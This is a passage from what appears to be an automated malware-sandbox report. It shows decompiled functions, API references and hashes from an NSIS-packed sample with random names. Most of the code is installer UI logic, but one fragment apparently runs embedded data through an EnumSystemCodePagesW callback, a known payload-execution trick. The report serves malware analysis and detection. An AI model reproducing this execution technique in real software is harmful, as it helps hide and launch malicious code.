					 *_t283 =  &E1001A000;
					_v40 = 0;
					_v32 = 0;
					EnumSystemCodePagesW(??, ??); // executed
				}
				return 0;
			}















                        0x10003d19
                        0x10003d20
                        0x10003d27
                        0x10003d2c
                        0x10003d33
                        0x10003d3c
                        0x10003d3f
                        0x10003d47
                        0x10003d4f
                        0x10003d54
                        0x10003d5b
                        0x10003d62
                        0x10003d7b
                        0x10003d85
                        0x10003d93
                        0x10003d9f
                        0x10003dad
                        0x10003dbb
                        0x10003dc7
                        0x10003dd6
                        0x10003deb
                        0x10003dfa
                        0x10003e06
                        0x10003e15
                        0x10003e21
                        0x10003e2d
                        0x10003e3b
                        0x10003e50
                        0x10003e5e
                        0x10003e69
                        0x10003e75
                        0x10003e8a
                        0x10003e96
                        0x10003ea4
                        0x10003eb2
                        0x10003ec7
                        0x10003ed3
                        0x10003ede
                        0x10003eea
                        0x10003ef9
                        0x10003f07
                        0x10003f15
                        0x10003f21
                        0x10003f2d
                        0x10003f42
                        0x10003f50
                        0x10003f5b
                        0x10003f69
                        0x10003f7e
                        0x10003f8a
                        0x10003f93
                        0x10003fa1
                        0x10003faf
                        0x10003fb8
                        0x10003fc5
                        0x10003fc5
                        0x10003fd5
                        0x10003fd8
                        0x10003fe0
                        0x10003fe3
                        0x10003fe9
                        0x10003ff5

                        APIs
                        • _malloc.LIBCMT ref: 10003D27
                          • Part of subcall function 1000591F: __FF_MSGBANNER.LIBCMT ref: 10005936
                          • Part of subcall function 1000591F: __NMSG_WRITE.LIBCMT ref: 1000593D
                          • Part of subcall function 1000591F: RtlAllocateHeap.NTDLL(00540000,00000000,00000001,?,?,?,?,10003D2C), ref: 10005962
                        • _memset.LIBCMT ref: 10003D4F
                        • EnumSystemCodePagesW.KERNELBASE ref: 10003FE3
                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: AllocateCodeEnumHeapPagesSystem_malloc_memset
                        • String ID:
                        • API String ID: 2588709530-0
                        • Opcode ID: 20cd1793eb66c7a46698b6cd1e920c6ff8b3ec179c82dffac674185a4da70a07
                        • Instruction ID: 62b1e2f3822842b48c6908203fdc025100517bb559dd5fbdad2d7dba892a74c1
                        • Opcode Fuzzy Hash: 20cd1793eb66c7a46698b6cd1e920c6ff8b3ec179c82dffac674185a4da70a07
                        • Instruction Fuzzy Hash: 86A1E852E191EE4ACF068ABD50629FFBEF35F66191F0E058ADCD277382C5A01904D7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405E93, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405E93(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x422588); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x422588;
			}




                        0x00405e9e
                        0x00405ea7
                        0x00000000
                        0x00405eb4
                        0x00405eaa
                        0x00000000

                        APIs
                        • FindFirstFileA.KERNELBASE(?,00422588,00421940,004057AF,00421940,00421940,00000000,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                        • FindClose.KERNEL32(00000000), ref: 00405EAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                        • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                        • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                        • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403981, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 84%
                        			E00403981(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42051c = _t35;
					if(_t115 == 0x110) {
						 *0x423f48 = _t125;
						 *0x420530 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f4f8 = _t91;
						E00403E54(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423728); // executed
						 *0x42370c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42051c = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423f60;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403EA0(0x40b);
						while(1) {
							_t37 =  *0x42051c;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x423f64; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42370c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423f64; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BBA(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E54(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423fcc - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E76(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f4f8, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423fcc - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420530);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f4f8);
							}
							E00403E89();
							E00405B98(0x420538, "ncjucqtyih Setup");
							E00405BBA(0x420538, _t125, _t130,  &(0x420538[lstrlenA(0x420538)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420538);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423718);
									 *0x41fd08 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f40,  *_t130 +  *0x423720 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423718 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E54(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423718, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42370c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423718, 8);
									E00403EA0(0x405);
									goto L58;
								}
								__eflags =  *0x423fcc - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423fc0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423718);
						 *0x423f48 = _t133;
						EndDialog(_t125,  *0x41f900);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423718, 0x40f, 0, 1);
						__eflags =  *0x42370c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420510, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420510,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EBB(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423718, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423fcc - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f900 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E2D();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f900 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423718);
						 *0x423718 = _a12;
						L58:
						if( *0x421538 == _t133) {
							_t142 =  *0x423718 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421538 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                        0x0040398a
                        0x00403993
                        0x00403ad4
                        0x00403ad8
                        0x00403adc
                        0x00403ade
                        0x00403ae3
                        0x00403aee
                        0x00403af9
                        0x00403afe
                        0x00403b00
                        0x00403b02
                        0x00403b05
                        0x00403b0a
                        0x00403b18
                        0x00403b25
                        0x00403b2c
                        0x00403b2c
                        0x00403b2d
                        0x00403b2d
                        0x00403b32
                        0x00403b38
                        0x00403b3f
                        0x00403b45
                        0x00403b47
                        0x00403b87
                        0x00403b8c
                        0x00403b91
                        0x00403b91
                        0x00403b96
                        0x00403b9f
                        0x00403ba1
                        0x00403ba6
                        0x00403bac
                        0x00403bb0
                        0x00403bb0
                        0x00403bb5
                        0x00403bbb
                        0x00000000
                        0x00000000
                        0x00403bc1
                        0x00403bc6
                        0x00403bcc
                        0x00000000
                        0x00000000
                        0x00403bd5
                        0x00403bdd
                        0x00403be2
                        0x00403be5
                        0x00403beb
                        0x00403bf0
                        0x00403bf3
                        0x00403bf9
                        0x00403bfe
                        0x00403c01
                        0x00403c07
                        0x00403c0f
                        0x00403c15
                        0x00403c1b
                        0x00403c1f
                        0x00403c26
                        0x00403c26
                        0x00403c26
                        0x00403c30
                        0x00403c42
                        0x00403c4e
                        0x00403c53
                        0x00403c5d
                        0x00403c63
                        0x00403c65
                        0x00403c6a
                        0x00403c67
                        0x00403c67
                        0x00403c67
                        0x00403c7a
                        0x00403c92
                        0x00403c94
                        0x00403c9a
                        0x00403caf
                        0x00403c9c
                        0x00403ca5
                        0x00403ca7
                        0x00403ca7
                        0x00403cb5
                        0x00403cc5
                        0x00403cd6
                        0x00403cdd
                        0x00403ce3
                        0x00403ce7
                        0x00403cec
                        0x00403cee
                        0x00000000
                        0x00403cf4
                        0x00403cf4
                        0x00403cf6
                        0x00000000
                        0x00000000
                        0x00403cfc
                        0x00403d00
                        0x00403d25
                        0x00403d2b
                        0x00403d31
                        0x00403d33
                        0x00000000
                        0x00000000
                        0x00403d59
                        0x00403d5f
                        0x00403d61
                        0x00403d66
                        0x00000000
                        0x00000000
                        0x00403d6c
                        0x00403d6f
                        0x00403d72
                        0x00403d89
                        0x00403d95
                        0x00403dae
                        0x00403db4
                        0x00403db8
                        0x00403dbd
                        0x00403dc3
                        0x00000000
                        0x00000000
                        0x00403dcd
                        0x00403dd8
                        0x00000000
                        0x00403dd8
                        0x00403d02
                        0x00403d08
                        0x00000000
                        0x00000000
                        0x00403d0e
                        0x00403d14
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403d1a
                        0x00403cee
                        0x00403de5
                        0x00403df1
                        0x00403df8
                        0x00000000
                        0x00403b49
                        0x00403b49
                        0x00403b4c
                        0x00403b7f
                        0x00403b7f
                        0x00403b81
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403b81
                        0x00403b4e
                        0x00403b52
                        0x00403b57
                        0x00403b59
                        0x00000000
                        0x00000000
                        0x00403b69
                        0x00403b71
                        0x00000000
                        0x00403b77
                        0x004039a5
                        0x004039a5
                        0x004039a9
                        0x004039ae
                        0x004039bd
                        0x004039bd
                        0x004039c6
                        0x004039cf
                        0x004039da
                        0x004039da
                        0x004039e6
                        0x00403a02
                        0x00403a05
                        0x00403a18
                        0x00403a1e
                        0x00403ac1
                        0x00000000
                        0x00403aca
                        0x00403a24
                        0x00403a31
                        0x00403a33
                        0x00403a35
                        0x00403a54
                        0x00403a54
                        0x00403a57
                        0x00403a5c
                        0x00403a5f
                        0x00403a6f
                        0x00403a70
                        0x00403a72
                        0x00403aa8
                        0x00403abb
                        0x00000000
                        0x00403abb
                        0x00403a74
                        0x00403a7a
                        0x00403a93
                        0x00403a98
                        0x00403a9a
                        0x00000000
                        0x00000000
                        0x00403a9c
                        0x00403a88
                        0x00403a88
                        0x00403a8a
                        0x00403a8a
                        0x00000000
                        0x00403a8a
                        0x00403a7d
                        0x00403a82
                        0x00000000
                        0x00403a82
                        0x00403a61
                        0x00403a67
                        0x00000000
                        0x00000000
                        0x00403a69
                        0x00000000
                        0x00403a69
                        0x00403a59
                        0x00000000
                        0x00403a59
                        0x00403a3f
                        0x00403a46
                        0x00403a4c
                        0x00403a4e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403a4e
                        0x00403a0a
                        0x00000000
                        0x004039e8
                        0x004039ee
                        0x004039f8
                        0x00403dfe
                        0x00403e04
                        0x00403e06
                        0x00403e0c
                        0x00403e11
                        0x00403e17
                        0x00403e17
                        0x00403e0c
                        0x00403e21
                        0x00000000
                        0x00403e21
                        0x004039e6

                        APIs
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                        • ShowWindow.USER32(?), ref: 004039DA
                        • DestroyWindow.USER32 ref: 004039EE
                        • SetWindowLongA.USER32 ref: 00403A0A
                        • GetDlgItem.USER32 ref: 00403A2B
                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A3F
                        • IsWindowEnabled.USER32(00000000), ref: 00403A46
                        • GetDlgItem.USER32 ref: 00403AF4
                        • GetDlgItem.USER32 ref: 00403AFE
                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B18
                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B69
                        • GetDlgItem.USER32 ref: 00403C0F
                        • ShowWindow.USER32(00000000,?), ref: 00403C30
                        • EnableWindow.USER32(?,?), ref: 00403C42
                        • EnableWindow.USER32(?,?), ref: 00403C5D
                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C73
                        • EnableMenuItem.USER32 ref: 00403C7A
                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C92
                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CA5
                        • lstrlenA.KERNEL32(00420538,?,00420538,ncjucqtyih Setup), ref: 00403CCE
                        • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                        • ShowWindow.USER32(?,0000000A), ref: 00403E11
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                        • String ID: ncjucqtyih Setup
                        • API String ID: 4050669955-3462911084
                        • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                        • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                        • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                        • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004035EB, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E004035EB(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x423f50; // 0x571700
				_t20 = E00405F28(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420538;
					"1033" = 0x7830;
					E00405A7F(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420538, 0);
					__eflags =  *0x420538;
					if(__eflags == 0) {
						E00405A7F(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x420538, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AF6("1033",  *_t20() & 0x0000ffff);
				}
				E004038B4(_t76, _t88);
				_t24 =  *0x423f58; // 0x80
				_t84 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x423fc0 = _t24 & 0x00000020;
				 *0x423fdc = 0x10000;
				if(E0040576C(_t88, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040576C(_t96, _t84) == 0) {
						E00405BBA(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f40, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423728 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038B4(_t76, __eflags);
							__eflags =  *0x423fe0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F56(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42370c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420510, 5); // executed
							_t37 = E00405EBA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EBA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x4236e0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x4236e0);
								 *0x423704 = _t85;
								RegisterClassA(0x4236e0);
							}
							_t39 =  *0x423720; // 0x0
							_t42 = DialogBoxParamA( *0x423f40, _t39 + 0x00000069 & 0x0000ffff, 0, E00403981, 0); // executed
							E0040353B(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f40; // 0x400000
						 *0x4236f4 = _t28;
						_v20 = 0x624e5f;
						 *0x4236e4 = E00401000;
						 *0x4236f0 = _t76;
						 *0x423704 =  &_v20;
						if(RegisterClassA(0x4236e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420510 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f40, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x423f78; // 0x5768fc
					_t79 = 0x422ee0;
					E00405A7F( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422ee0, 0);
					_t62 =  *0x422ee0; // 0x6b
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422ee1;
						 *((char*)(E004056B6(0x422ee1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B98(_t84, E0040568B(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056D2(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                        0x004035f1
                        0x004035fa
                        0x00403601
                        0x00403603
                        0x00403617
                        0x00403629
                        0x00403633
                        0x00403638
                        0x0040363e
                        0x00403651
                        0x00403651
                        0x0040365c
                        0x00403605
                        0x00403610
                        0x00403610
                        0x00403661
                        0x00403666
                        0x0040366b
                        0x00403674
                        0x00403679
                        0x0040368a
                        0x00403711
                        0x00403719
                        0x00403722
                        0x00403722
                        0x00403738
                        0x0040373e
                        0x0040374c
                        0x004037db
                        0x004037e3
                        0x004037ed
                        0x004037f2
                        0x004037f8
                        0x00403882
                        0x00403887
                        0x00403889
                        0x004038a5
                        0x00000000
                        0x004038a5
                        0x0040388b
                        0x00403891
                        0x00403899
                        0x00403899
                        0x00000000
                        0x00403891
                        0x00403806
                        0x00403811
                        0x00403816
                        0x00403818
                        0x0040381f
                        0x0040381f
                        0x0040382a
                        0x00403832
                        0x00403834
                        0x00403836
                        0x0040383f
                        0x00403842
                        0x00403848
                        0x00403848
                        0x0040384e
                        0x00403867
                        0x00403878
                        0x00000000
                        0x0040387d
                        0x004037e5
                        0x004037e7
                        0x00000000
                        0x00403752
                        0x00403752
                        0x00403758
                        0x00403762
                        0x0040376a
                        0x00403774
                        0x0040377a
                        0x00403788
                        0x004038aa
                        0x004038aa
                        0x00000000
                        0x004038aa
                        0x0040378e
                        0x00403797
                        0x004037d6
                        0x00000000
                        0x004037d6
                        0x00403690
                        0x00403690
                        0x00403695
                        0x00000000
                        0x00000000
                        0x0040369a
                        0x0040369f
                        0x004036af
                        0x004036b4
                        0x004036bb
                        0x00000000
                        0x00000000
                        0x004036bf
                        0x004036c1
                        0x004036ce
                        0x004036ce
                        0x004036d6
                        0x004036dc
                        0x00403704
                        0x0040370c
                        0x00000000
                        0x004036ee
                        0x004036ef
                        0x004036f8
                        0x004036fe
                        0x004036ff
                        0x00000000
                        0x004036ff
                        0x004036fa
                        0x004036fc
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004036fc
                        0x004036dc

                        APIs
                          • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                          • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                        • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\aZOmps0Ug8.exe" ,00000000), ref: 0040365C
                        • lstrlenA.KERNEL32(kzopaqjcb,?,?,?,kzopaqjcb,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                        • lstrcmpiA.KERNEL32(?,.exe,kzopaqjcb,?,?,?,kzopaqjcb,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                        • GetFileAttributesA.KERNEL32(kzopaqjcb), ref: 004036EF
                        • LoadImageA.USER32 ref: 00403738
                          • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                        • RegisterClassA.USER32 ref: 0040377F
                        • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                        • CreateWindowExA.USER32 ref: 004037D0
                        • ShowWindow.USER32(00000005,00000000), ref: 00403806
                        • GetClassInfoA.USER32 ref: 00403832
                        • GetClassInfoA.USER32 ref: 0040383F
                        • RegisterClassA.USER32 ref: 00403848
                        • DialogBoxParamA.USER32 ref: 00403867
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                        • String ID: "C:\Users\user\Desktop\aZOmps0Ug8.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$kzopaqjcb$6B
                        • API String ID: 1975747703-517710743
                        • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                        • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                        • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
